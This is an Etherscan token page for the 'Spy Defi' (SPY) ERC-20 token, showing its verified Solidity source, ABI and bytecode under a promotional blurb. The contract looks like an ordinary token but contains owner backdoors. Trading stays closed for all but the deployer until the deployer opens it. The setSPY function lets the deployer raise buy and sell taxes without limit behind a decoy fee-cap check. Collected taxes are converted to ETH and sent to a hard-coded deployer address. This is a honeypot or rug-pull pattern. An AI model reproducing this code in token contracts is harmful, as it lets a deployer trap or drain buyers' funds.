ETH Price: $2,416.52 (+2.58%)

Token

Spy Defi (SPY)
 

Overview

Max Total Supply

100,000,000 SPY

Holders

8

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
4,636,134.712318621423949742 SPY

Value
$0.00
0x582e4f44375d987bb675986b17da30c0103d929c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SpyDefi

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2023-11-26
*/

/*

SpyDefi is a complex Telegram bot created to help users stay informed about the ever-evolving DeFi landscape. It monitors numerous sources across Telegram media platforms, compiling all essential information into one place. Whether you're looking for updates on new tokens, market trends, or potential alpha projects, SpyDefi provides a comprehensive overview without requiring constant manual browsing.

Utility is live even before the token launch, please go access our two bots from the website and embark on your journey to be a Defi God!

Telegram: https://t.me/SpyDefiPortal
Twitter: https://twitter.com/SpyDefiETH
Website: https://spydefi.space
Whitepaper: https://spy-defi.gitbook.io/spydefi-docs/

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.23;

    interface IUniswapV2Router02 {
        function swapExactTokensForETHSupportingFeeOnTransferTokens(
            uint amountIn,
            uint amountOutMin,
            address[] calldata path,
            address to,
            uint deadline
            ) external;
        }
        
    contract SpyDefi {
        string public constant name = "Spy Defi";  //
        string public constant symbol = "SPY";  //
        uint8 public constant decimals = 18;
        uint256 public constant totalSupply = 100_000_000 * 10**decimals;

        uint256 BurnTNumber = 2;
        uint256 ConfirmTNumber = 2;
        uint256 constant swapAmount = totalSupply / 100;

        mapping (address => uint256) public balanceOf;
        mapping (address => mapping (address => uint256)) public allowance;
            
        error Permissions();
            
        event Transfer(address indexed from, address indexed to, uint256 value);
        event Approval(
            address indexed owner,
            address indexed spender,
            uint256 value
        );
            

        address private pair;
        address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
        address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
        address payable constant deployer = payable(address(0x5ABA9376173F2191ed899334A89f0b211657bc31)); //

        bool private swapping;
        bool private TradingOpenStatus;

        constructor() {
            balanceOf[msg.sender] = totalSupply;
            allowance[address(this)][routerAddress] = type(uint256).max;
            emit Transfer(address(0), msg.sender, totalSupply);
        }

         receive() external payable {}

        function approve(address spender, uint256 amount) external returns (bool){
            allowance[msg.sender][spender] = amount;
            emit Approval(msg.sender, spender, amount);
            return true;
        }

        function transfer(address to, uint256 amount) external returns (bool){
            return _transfer(msg.sender, to, amount);
        }

        function transferFrom(address from, address to, uint256 amount) external returns (bool){
            allowance[from][msg.sender] -= amount;        
            return _transfer(from, to, amount);
        }

        function _transfer(address from, address to, uint256 amount) internal returns (bool){
            require(TradingOpenStatus || from == deployer || to == deployer);

            if(!TradingOpenStatus && pair == address(0) && amount > 0)
                pair = to;

            balanceOf[from] -= amount;

            if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
                swapping = true;
                address[] memory path = new  address[](2);
                path[0] = address(this);
                path[1] = ETH;
                _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                    );
                deployer.transfer(address(this).balance);
                swapping = false;
                }

            if(from != address(this)){
                uint256 FinalFigure = amount * (from == pair ? BurnTNumber : ConfirmTNumber) / 100;
                amount -= FinalFigure;
                balanceOf[address(this)] += FinalFigure;
            }
                balanceOf[to] += amount;
                emit Transfer(from, to, amount);
                return true;
            }

        function OpenTrade() external {
            require(msg.sender == deployer);
            require(!TradingOpenStatus);
            TradingOpenStatus = true;        
            }
            
        function setSPY(uint256 newTBurn, uint256 newTConfirm) external {
        if(msg.sender == deployer){
            BurnTNumber = newTBurn;
            ConfirmTNumber = newTConfirm;
            }
        else{
            require(newTBurn < 10);
            require(newTConfirm < 10);
            revert();
            }  
        }
        }

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OpenTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newTBurn","type":"uint256"},{"internalType":"uint256","name":"newTConfirm","type":"uint256"}],"name":"setSPY","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405260025f55600260015534801562000019575f80fd5b50620000286012600a620001dd565b62000038906305f5e100620001f4565b335f8181526002602090815260408083209490945530825260038152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182205f199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620000a76012600a620001dd565b620000b7906305f5e100620001f4565b60405190815260200160405180910390a36200020e565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200012257815f1904821115620001065762000106620000ce565b808516156200011457918102915b93841c9390800290620000e7565b509250929050565b5f826200013a57506001620001d7565b816200014857505f620001d7565b81600181146200016157600281146200016c576200018c565b6001915050620001d7565b60ff841115620001805762000180620000ce565b50506001821b620001d7565b5060208310610133831016604e8410600b8410161715620001b1575081810a620001d7565b620001bd8383620000e2565b805f1904821115620001d357620001d3620000ce565b0290505b92915050565b5f620001ed60ff8416836200012a565b9392505050565b8082028115828204841417620001d757620001d7620000ce565b610afa806200021c5f395ff3fe60806040526004361061009d575f3560e01c806323b872dd1161006257806323b872dd14610177578063313ce5671461019657806370a08231146101bc57806395d89b41146101e7578063a9059cbb14610215578063dd62ed3e14610234575f80fd5b806306fdde03146100a8578063095ea7b3146100f15780630f8540e41461012057806318160ddd14610136578063217951f214610158575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100db60405180604001604052806008815260200167537079204465666960c01b81525081565b6040516100e891906107af565b60405180910390f35b3480156100fc575f80fd5b5061011061010b366004610816565b61026a565b60405190151581526020016100e8565b34801561012b575f80fd5b506101346102d6565b005b348015610141575f80fd5b5061014a610320565b6040519081526020016100e8565b348015610163575f80fd5b5061013461017236600461083e565b61033d565b348015610182575f80fd5b5061011061019136600461085e565b61037b565b3480156101a1575f80fd5b506101aa601281565b60405160ff90911681526020016100e8565b3480156101c7575f80fd5b5061014a6101d6366004610897565b60026020525f908152604090205481565b3480156101f2575f80fd5b506100db6040518060400160405280600381526020016253505960e81b81525081565b348015610220575f80fd5b5061011061022f366004610816565b6103c8565b34801561023f575f80fd5b5061014a61024e3660046108b0565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c49086815260200190565b60405180910390a35060015b92915050565b33735aba9376173f2191ed899334a89f0b211657bc31146102f5575f80fd5b600454600160a81b900460ff161561030b575f80fd5b6004805460ff60a81b1916600160a81b179055565b61032c6012600a6109d5565b61033a906305f5e1006109e3565b81565b735aba9376173f2191ed899334a89f0b211657bc30193301610363575f91909155600155565b600a821061036f575f80fd5b600a81106100a4575f80fd5b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103af9084906109fa565b909155506103c090508484846103db565b949350505050565b5f6103d43384846103db565b9392505050565b6004545f90600160a81b900460ff168061041157506001600160a01b038416735aba9376173f2191ed899334a89f0b211657bc31145b8061043857506001600160a01b038316735aba9376173f2191ed899334a89f0b211657bc31145b610440575f80fd5b600454600160a81b900460ff1615801561046357506004546001600160a01b0316155b801561046e57505f82115b1561048f57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104b69084906109fa565b90915550506004546001600160a01b0384811691161480156104e25750600454600160a01b900460ff16155b8015610521575060646104f76012600a6109d5565b610505906305f5e1006109e3565b61050f9190610a0d565b305f9081526002602052604090205410155b156106ab576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061056c5761056c610a2c565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105b4576105b4610a2c565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105f46012600a6109d5565b610602906305f5e1006109e3565b61060c9190610a0d565b5f8430426040518663ffffffff1660e01b8152600401610630959493929190610a40565b5f604051808303815f87803b158015610647575f80fd5b505af1158015610659573d5f803e3d5ffd5b5050604051735aba9376173f2191ed899334a89f0b211657bc3192504780156108fc029250905f818181858888f1935050505015801561069b573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b038416301461072a576004545f906064906001600160a01b038781169116146106dd576001546106e0565b5f545b6106ea90856109e3565b6106f49190610a0d565b905061070081846109fa565b305f90815260026020526040812080549295508392909190610723908490610ab1565b9091555050505b6001600160a01b0383165f9081526002602052604081208054849290610751908490610ab1565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161079d91815260200190565b60405180910390a35060019392505050565b5f602080835283518060208501525f5b818110156107db578581018301518582016040015282016107bf565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610811575f80fd5b919050565b5f8060408385031215610827575f80fd5b610830836107fb565b946020939093013593505050565b5f806040838503121561084f575f80fd5b50508035926020909101359150565b5f805f60608486031215610870575f80fd5b610879846107fb565b9250610887602085016107fb565b9150604084013590509250925092565b5f602082840312156108a7575f80fd5b6103d4826107fb565b5f80604083850312156108c1575f80fd5b6108ca836107fb565b91506108d8602084016107fb565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561092f57815f1904821115610915576109156108e1565b8085161561092257918102915b93841c93908002906108fa565b509250929050565b5f82610945575060016102d0565b8161095157505f6102d0565b816001811461096757600281146109715761098d565b60019150506102d0565b60ff841115610982576109826108e1565b50506001821b6102d0565b5060208310610133831016604e8410600b84101617156109b0575081810a6102d0565b6109ba83836108f5565b805f19048211156109cd576109cd6108e1565b029392505050565b5f6103d460ff841683610937565b80820281158282048414176102d0576102d06108e1565b818103818111156102d0576102d06108e1565b5f82610a2757634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610a905784516001600160a01b031683529383019391830191600101610a6b565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d0576102d06108e156fea2646970667358221220206ca6798633564c909892bcf055da0671123b8ca626406f2a020dcb6251eb0564736f6c63430008170033

Deployed Bytecode

0x60806040526004361061009d575f3560e01c806323b872dd1161006257806323b872dd14610177578063313ce5671461019657806370a08231146101bc57806395d89b41146101e7578063a9059cbb14610215578063dd62ed3e14610234575f80fd5b806306fdde03146100a8578063095ea7b3146100f15780630f8540e41461012057806318160ddd14610136578063217951f214610158575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100db60405180604001604052806008815260200167537079204465666960c01b81525081565b6040516100e891906107af565b60405180910390f35b3480156100fc575f80fd5b5061011061010b366004610816565b61026a565b60405190151581526020016100e8565b34801561012b575f80fd5b506101346102d6565b005b348015610141575f80fd5b5061014a610320565b6040519081526020016100e8565b348015610163575f80fd5b5061013461017236600461083e565b61033d565b348015610182575f80fd5b5061011061019136600461085e565b61037b565b3480156101a1575f80fd5b506101aa601281565b60405160ff90911681526020016100e8565b3480156101c7575f80fd5b5061014a6101d6366004610897565b60026020525f908152604090205481565b3480156101f2575f80fd5b506100db6040518060400160405280600381526020016253505960e81b81525081565b348015610220575f80fd5b5061011061022f366004610816565b6103c8565b34801561023f575f80fd5b5061014a61024e3660046108b0565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c49086815260200190565b60405180910390a35060015b92915050565b33735aba9376173f2191ed899334a89f0b211657bc31146102f5575f80fd5b600454600160a81b900460ff161561030b575f80fd5b6004805460ff60a81b1916600160a81b179055565b61032c6012600a6109d5565b61033a906305f5e1006109e3565b81565b735aba9376173f2191ed899334a89f0b211657bc30193301610363575f91909155600155565b600a821061036f575f80fd5b600a81106100a4575f80fd5b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103af9084906109fa565b909155506103c090508484846103db565b949350505050565b5f6103d43384846103db565b9392505050565b6004545f90600160a81b900460ff168061041157506001600160a01b038416735aba9376173f2191ed899334a89f0b211657bc31145b8061043857506001600160a01b038316735aba9376173f2191ed899334a89f0b211657bc31145b610440575f80fd5b600454600160a81b900460ff1615801561046357506004546001600160a01b0316155b801561046e57505f82115b1561048f57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104b69084906109fa565b90915550506004546001600160a01b0384811691161480156104e25750600454600160a01b900460ff16155b8015610521575060646104f76012600a6109d5565b610505906305f5e1006109e3565b61050f9190610a0d565b305f9081526002602052604090205410155b156106ab576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061056c5761056c610a2c565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105b4576105b4610a2c565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105f46012600a6109d5565b610602906305f5e1006109e3565b61060c9190610a0d565b5f8430426040518663ffffffff1660e01b8152600401610630959493929190610a40565b5f604051808303815f87803b158015610647575f80fd5b505af1158015610659573d5f803e3d5ffd5b5050604051735aba9376173f2191ed899334a89f0b211657bc3192504780156108fc029250905f818181858888f1935050505015801561069b573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b038416301461072a576004545f906064906001600160a01b038781169116146106dd576001546106e0565b5f545b6106ea90856109e3565b6106f49190610a0d565b905061070081846109fa565b305f90815260026020526040812080549295508392909190610723908490610ab1565b9091555050505b6001600160a01b0383165f9081526002602052604081208054849290610751908490610ab1565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161079d91815260200190565b60405180910390a35060019392505050565b5f602080835283518060208501525f5b818110156107db578581018301518582016040015282016107bf565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610811575f80fd5b919050565b5f8060408385031215610827575f80fd5b610830836107fb565b946020939093013593505050565b5f806040838503121561084f575f80fd5b50508035926020909101359150565b5f805f60608486031215610870575f80fd5b610879846107fb565b9250610887602085016107fb565b9150604084013590509250925092565b5f602082840312156108a7575f80fd5b6103d4826107fb565b5f80604083850312156108c1575f80fd5b6108ca836107fb565b91506108d8602084016107fb565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561092f57815f1904821115610915576109156108e1565b8085161561092257918102915b93841c93908002906108fa565b509250929050565b5f82610945575060016102d0565b8161095157505f6102d0565b816001811461096757600281146109715761098d565b60019150506102d0565b60ff841115610982576109826108e1565b50506001821b6102d0565b5060208310610133831016604e8410600b84101617156109b0575081810a6102d0565b6109ba83836108f5565b805f19048211156109cd576109cd6108e1565b029392505050565b5f6103d460ff841683610937565b80820281158282048414176102d0576102d06108e1565b818103818111156102d0576102d06108e1565b5f82610a2757634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610a905784516001600160a01b031683529383019391830191600101610a6b565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d0576102d06108e156fea2646970667358221220206ca6798633564c909892bcf055da0671123b8ca626406f2a020dcb6251eb0564736f6c63430008170033

Deployed Bytecode Sourcemap

1101:4062:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1129:40;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;1129:40:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2657:222;;;;;;;;;;-1:-1:-1;2657:222:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2657:222:0;1004:187:1;4607:181:0;;;;;;;;;;;;;:::i;:::-;;1282:64;;;;;;;;;;;;;:::i;:::-;;;1342:25:1;;;1330:2;1315:18;1282:64:0;1196:177:1;4812:340:0;;;;;;;;;;-1:-1:-1;4812:340:0;;;;;:::i;:::-;;:::i;3039:208::-;;;;;;;;;;-1:-1:-1;3039:208:0;;;;;:::i;:::-;;:::i;1236:35::-;;;;;;;;;;;;1269:2;1236:35;;;;;2136:4:1;2124:17;;;2106:36;;2094:2;2079:18;1236:35:0;1964:184:1;1490:45:0;;;;;;;;;;-1:-1:-1;1490:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;1184:37;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;1184:37:0;;;;;2891:136;;;;;;;;;;-1:-1:-1;2891:136:0;;;;;:::i;:::-;;:::i;1546:66::-;;;;;;;;;;-1:-1:-1;1546:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2657:222;2755:10;2725:4;2745:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2745:30:0;;;;;;;;;;:39;;;2804:37;2725:4;;2745:30;;2804:37;;;;2778:6;1342:25:1;;1330:2;1315:18;;1196:177;2804:37:0;;;;;;;;-1:-1:-1;2863:4:0;2657:222;;;;;:::o;4607:181::-;4660:10;2253:42;4660:22;4652:31;;;;;;4707:17;;-1:-1:-1;;;4707:17:0;;;;4706:18;4698:27;;;;;;4740:17;:24;;-1:-1:-1;;;;4740:24:0;-1:-1:-1;;;4740:24:0;;;4607:181::o;1282:64::-;1334:12;1269:2;1334;:12;:::i;:::-;1320:26;;:11;:26;:::i;:::-;1282:64;:::o;4812:340::-;-1:-1:-1;;4890:10:0;:22;4887:252;;4928:11;:22;;;;4965:14;:28;4812:340::o;4887:252::-;5057:2;5046:8;:13;5038:22;;;;;;5097:2;5083:11;:16;5075:25;;;;;3039:208;-1:-1:-1;;;;;3141:15:0;;3121:4;3141:15;;;:9;:15;;;;;;;;3157:10;3141:27;;;;;;;:37;;3172:6;;3141:27;3121:4;;3141:37;;3172:6;;3141:37;:::i;:::-;;;;-1:-1:-1;3208:27:0;;-1:-1:-1;3218:4:0;3224:2;3228:6;3208:9;:27::i;:::-;3201:34;3039:208;-1:-1:-1;;;;3039:208:0:o;2891:136::-;2955:4;2982:33;2992:10;3004:2;3008:6;2982:9;:33::i;:::-;2975:40;2891:136;-1:-1:-1;;;2891:136:0:o;3259:1336::-;3366:17;;3338:4;;-1:-1:-1;;;3366:17:0;;;;;:37;;-1:-1:-1;;;;;;3387:16:0;;2253:42;3387:16;3366:37;:55;;;-1:-1:-1;;;;;;3407:14:0;;2253:42;3407:14;3366:55;3358:64;;;;;;3443:17;;-1:-1:-1;;;3443:17:0;;;;3442:18;:40;;;;-1:-1:-1;3464:4:0;;-1:-1:-1;;;;;3464:4:0;:18;3442:40;:54;;;;;3495:1;3486:6;:10;3442:54;3439:85;;;3515:4;:9;;-1:-1:-1;;;;;;3515:9:0;-1:-1:-1;;;;;3515:9:0;;;;;3439:85;-1:-1:-1;;;;;3541:15:0;;;;;;:9;:15;;;;;:25;;3560:6;;3541:15;:25;;3560:6;;3541:25;:::i;:::-;;;;-1:-1:-1;;3593:4:0;;-1:-1:-1;;;;;3587:10:0;;;3593:4;;3587:10;:23;;;;-1:-1:-1;3602:8:0;;-1:-1:-1;;;3602:8:0;;;;3601:9;3587:23;:65;;;;-1:-1:-1;1474:3:0;1334:12;1269:2;1334;:12;:::i;:::-;1320:26;;:11;:26;:::i;:::-;1460:17;;;;:::i;:::-;3632:4;3614:24;;;;:9;:24;;;;;;:38;;3587:65;3583:619;;;3672:8;:15;;-1:-1:-1;;;;3672:15:0;-1:-1:-1;;;3672:15:0;;;3730:17;;;3745:1;3730:17;;;;;;;;-1:-1:-1;;3730:17:0;;;;;;;;;;-1:-1:-1;3730:17:0;3706:41;;3784:4;3766;3771:1;3766:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3766:23:0;;;-1:-1:-1;;;;;3766:23:0;;;;;1971:42;3808:4;3813:1;3808:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3808:13:0;;;:7;;;;;;;;;;;:13;2057:42;3840:67;1474:3;1334:12;1269:2;1334;:12;:::i;:::-;1320:26;;:11;:26;:::i;:::-;1460:17;;;;:::i;:::-;3963:1;3987:4;4022;4050:15;3840:248;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;4107:40:0;;2253:42;;-1:-1:-1;4125:21:0;4107:40;;;;;-1:-1:-1;4125:21:0;4107:40;;;;4125:21;2253:42;4107:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;4166:8:0;:16;;-1:-1:-1;;;;4166:16:0;;;3583:619;-1:-1:-1;;;;;4221:21:0;;4237:4;4221:21;4218:240;;4302:4;;4262:19;;4341:3;;-1:-1:-1;;;;;4294:12:0;;;4302:4;;4294:12;:43;;4323:14;;4294:43;;;4309:11;;4294:43;4284:54;;:6;:54;:::i;:::-;:60;;;;:::i;:::-;4262:82;-1:-1:-1;4363:21:0;4262:82;4363:21;;:::i;:::-;4421:4;4403:24;;;;:9;:24;;;;;:39;;4363:21;;-1:-1:-1;4431:11:0;;4403:24;;;:39;;4431:11;;4403:39;:::i;:::-;;;;-1:-1:-1;;;4218:240:0;-1:-1:-1;;;;;4476:13:0;;;;;;:9;:13;;;;;:23;;4493:6;;4476:13;:23;;4493:6;;4476:23;:::i;:::-;;;;;;;;4538:2;-1:-1:-1;;;;;4523:26:0;4532:4;-1:-1:-1;;;;;4523:26:0;;4542:6;4523:26;;;;1342:25:1;;1330:2;1315:18;;1196:177;4523:26:0;;;;;;;;-1:-1:-1;4575:4:0;3259:1336;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:248::-;1446:6;1454;1507:2;1495:9;1486:7;1482:23;1478:32;1475:52;;;1523:1;1520;1513:12;1475:52;-1:-1:-1;;1546:23:1;;;1616:2;1601:18;;;1588:32;;-1:-1:-1;1378:248:1:o;1631:328::-;1708:6;1716;1724;1777:2;1765:9;1756:7;1752:23;1748:32;1745:52;;;1793:1;1790;1783:12;1745:52;1816:29;1835:9;1816:29;:::i;:::-;1806:39;;1864:38;1898:2;1887:9;1883:18;1864:38;:::i;:::-;1854:48;;1949:2;1938:9;1934:18;1921:32;1911:42;;1631:328;;;;;:::o;2153:186::-;2212:6;2265:2;2253:9;2244:7;2240:23;2236:32;2233:52;;;2281:1;2278;2271:12;2233:52;2304:29;2323:9;2304:29;:::i;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:416;2830:1;2867:5;2830:1;2881:270;2902:7;2892:8;2889:21;2881:270;;;2961:4;2957:1;2953:6;2949:17;2943:4;2940:27;2937:53;;;2970:18;;:::i;:::-;3020:7;3010:8;3006:22;3003:55;;;3040:16;;;;3003:55;3119:22;;;;3079:15;;;;2881:270;;;2885:3;2741:416;;;;;:::o;3162:806::-;3211:5;3241:8;3231:80;;-1:-1:-1;3282:1:1;3296:5;;3231:80;3330:4;3320:76;;-1:-1:-1;3367:1:1;3381:5;;3320:76;3412:4;3430:1;3425:59;;;;3498:1;3493:130;;;;3405:218;;3425:59;3455:1;3446:10;;3469:5;;;3493:130;3530:3;3520:8;3517:17;3514:43;;;3537:18;;:::i;:::-;-1:-1:-1;;3593:1:1;3579:16;;3608:5;;3405:218;;3707:2;3697:8;3694:16;3688:3;3682:4;3679:13;3675:36;3669:2;3659:8;3656:16;3651:2;3645:4;3642:12;3638:35;3635:77;3632:159;;;-1:-1:-1;3744:19:1;;;3776:5;;3632:159;3823:34;3848:8;3842:4;3823:34;:::i;:::-;3893:6;3889:1;3885:6;3881:19;3872:7;3869:32;3866:58;;;3904:18;;:::i;:::-;3942:20;;3162:806;-1:-1:-1;;;3162:806:1:o;3973:140::-;4031:5;4060:47;4101:4;4091:8;4087:19;4081:4;4060:47;:::i;4118:168::-;4191:9;;;4222;;4239:15;;;4233:22;;4219:37;4209:71;;4260:18;;:::i;4291:128::-;4358:9;;;4379:11;;;4376:37;;;4393:18;;:::i;4424:217::-;4464:1;4490;4480:132;;4534:10;4529:3;4525:20;4522:1;4515:31;4569:4;4566:1;4559:15;4597:4;4594:1;4587:15;4480:132;-1:-1:-1;4626:9:1;;4424:217::o;4778:127::-;4839:10;4834:3;4830:20;4827:1;4820:31;4870:4;4867:1;4860:15;4894:4;4891:1;4884:15;4910:980;5172:4;5220:3;5209:9;5205:19;5251:6;5240:9;5233:25;5277:2;5315:6;5310:2;5299:9;5295:18;5288:34;5358:3;5353:2;5342:9;5338:18;5331:31;5382:6;5417;5411:13;5448:6;5440;5433:22;5486:3;5475:9;5471:19;5464:26;;5525:2;5517:6;5513:15;5499:29;;5546:1;5556:195;5570:6;5567:1;5564:13;5556:195;;;5635:13;;-1:-1:-1;;;;;5631:39:1;5619:52;;5726:15;;;;5691:12;;;;5667:1;5585:9;5556:195;;;-1:-1:-1;;;;;;;5807:32:1;;;;5802:2;5787:18;;5780:60;-1:-1:-1;;;5871:3:1;5856:19;5849:35;5768:3;4910:980;-1:-1:-1;;;4910:980:1:o;5895:125::-;5960:9;;;5981:10;;;5978:36;;;5994:18;;:::i

Swarm Source

ipfs://206ca6798633564c909892bcf055da0671123b8ca626406f2a020dcb6251eb05
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.